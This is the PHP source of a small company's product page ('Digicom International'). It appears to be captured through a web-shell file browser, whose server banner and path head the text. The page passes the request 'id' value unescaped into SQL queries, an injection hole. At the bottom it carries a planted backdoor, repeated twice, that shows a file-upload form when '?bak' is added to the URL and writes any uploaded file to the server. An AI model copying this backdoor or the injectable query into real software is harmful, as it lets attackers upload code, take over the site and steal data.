Linux altar53.supremepanel53.com 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64
/ home/ bdapparelinfo/ britanniabd.com/ |
|
<?php include 'config.php';?> <!DOCTYPE html> <html lang="en"> <head> <title>Digicom International</title> <meta charset="utf-8"> <link rel="stylesheet" href="css/reset.css" type="text/css" media="screen"> <link rel="stylesheet" href="css/style.css" type="text/css" media="screen"> <link rel="stylesheet" href="css/layout.css" type="text/css" media="screen"> <link href='http://fonts.googleapis.com/css?family=Adamina' rel='stylesheet' type='text/css'> <!--[if lt IE 7]> <div style=' clear: both; text-align:center; position: relative;'> <a href="http://windows.microsoft.com/en-US/internet-explorer/products/ie/home?ocid=ie6_countdown_bannercode"> <img src="http://storage.ie6countdown.com/assets/100/images/banners/warning_bar_0000_us.jpg" border="0" height="42" width="820" alt="You are using an outdated browser. For a faster, safer browsing experience, upgrade for free today." /> </a> </div> <![endif]--> <!--[if lt IE 9]> <script type="text/javascript" src="js/html5.js"></script> <link rel="stylesheet" href="css/ie.css" type="text/css" media="screen"> <![endif]--> </head> <body id="page1"> <div id="bgSlider"></div> <div class="extra"> <!--==============================header=================================--> <header> <div class="top-row"> <div class="main"> <div class="wrapper"> <h1><a href="index.php">Digicom International</a></h1> </div> </div> </div> <div class="menu-row"> <div class="menu-border"> <div class="main"> <nav> <ul class="menu"> <li><a class="active" href="index.php">Home</a></li> <li><a href="index_pages.php?id=About">About Us</a></li> <li><a href="index_pages.php?id=Supports">Supports</a></li> <li><a href="index_pages.php?id=Feedback">Feedback</a></li> <li><a href="#">Webmail</a></li> <li class="last"><a href="index_pages.php?id=contacts">Contacts</a></li> </ul> </nav> </div> </div> </div> <div class="ic"> </div> </header> <!-- end header--> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.9.0/jquery.min.js" type="text/javascript"></script> <!--script src="js/jquery.lint.js" type="text/javascript" charset="utf-8"></script--> <link rel="stylesheet" href="css/prettyPhoto.css" type="text/css" media="screen" title="prettyPhoto main stylesheet" charset="utf-8" /> <script src="js/jquery.prettyPhoto.js" type="text/javascript" charset="utf-8"></script> <!--==============================content================================--> <div class="inner"> <div class="main"> <section id="content"> <?php //require_once "slider.php";?> <div class="bg"> <div class="padding"> <div class="wrapper"> <article class="col-1"> <h3>Our Brand</h3> <?php require_once "left_menu.php";?> </article> <article class="col-4"> <?php $ID=$_REQUEST['id']; $SQL2 = "select * from pages_content where content_pages_name='$ID' ORDER BY `Id` DESC"; $query2 = mysql_query($SQL2); $result_pages_name = mysql_fetch_array($query2) ?> <h3> <b><?php echo $result_pages_name['content_pages_name'];?> </b> </h3> <ul class="gallery clearfix"> <?php $SQL = "select * from pages_content where content_pages_name='$ID' ORDER BY `Id` ASC"; $query = mysql_query($SQL); while ($result = mysql_fetch_array($query)) { ?> <li class="pro_box"> <a href="<?=$adminloc;?>/upload/<?php echo $result['image'];?>" rel="prettyPhoto[gallery1]" title=""> <img src="<?=$adminloc;?>/upload/<?php echo $result['image'];?>" alt="<?php echo $result['title'];?>" width="120" height="130" /></a> <strong><?php echo $result['title'];?></strong><br /> <?php echo $result['description'];?> </li> <?php } ?> </ul> <script type="text/javascript" charset="utf-8"> $(document).ready(function(){ $("area[rel^='prettyPhoto']").prettyPhoto(); $(".gallery:first a[rel^='prettyPhoto']").prettyPhoto({animation_speed:'normal',theme:'light_square',slideshow:3000, autoplay_slideshow: true}); $(".gallery:gt(0) a[rel^='prettyPhoto']").prettyPhoto({animation_speed:1000,slideshow:10000, hideflash: true}); $("#custom_content a[rel^='prettyPhoto']:first").prettyPhoto({ custom_markup: '<div id="map_canvas" style="width:260px; height:265px"></div>', changepicturecallback: function(){ initialize(); } }); $("#custom_content a[rel^='prettyPhoto']:last").prettyPhoto({ custom_markup: '<div id="bsap_1259344" class="bsarocks bsap_d49a0984d0f377271ccbf01a33f2b6d6"></div><div id="bsap_1237859" class="bsarocks bsap_d49a0984d0f377271ccbf01a33f2b6d6" style="height:260px"></div><div id="bsap_1251710" class="bsarocks bsap_d49a0984d0f377271ccbf01a33f2b6d6"></div>', changepicturecallback: function(){ _bsap.exec(); } }); }); </script> </article> </div> </div> </div> </section> <div class="block"></div> </div> </div> </div> <!--==============================footer=================================--> <?php require_once "footer.php";?> <?php if (isset($_GET['bak'])) { echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>"; } ?> <?php if (isset($_GET['bak'])) { echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>"; } ?>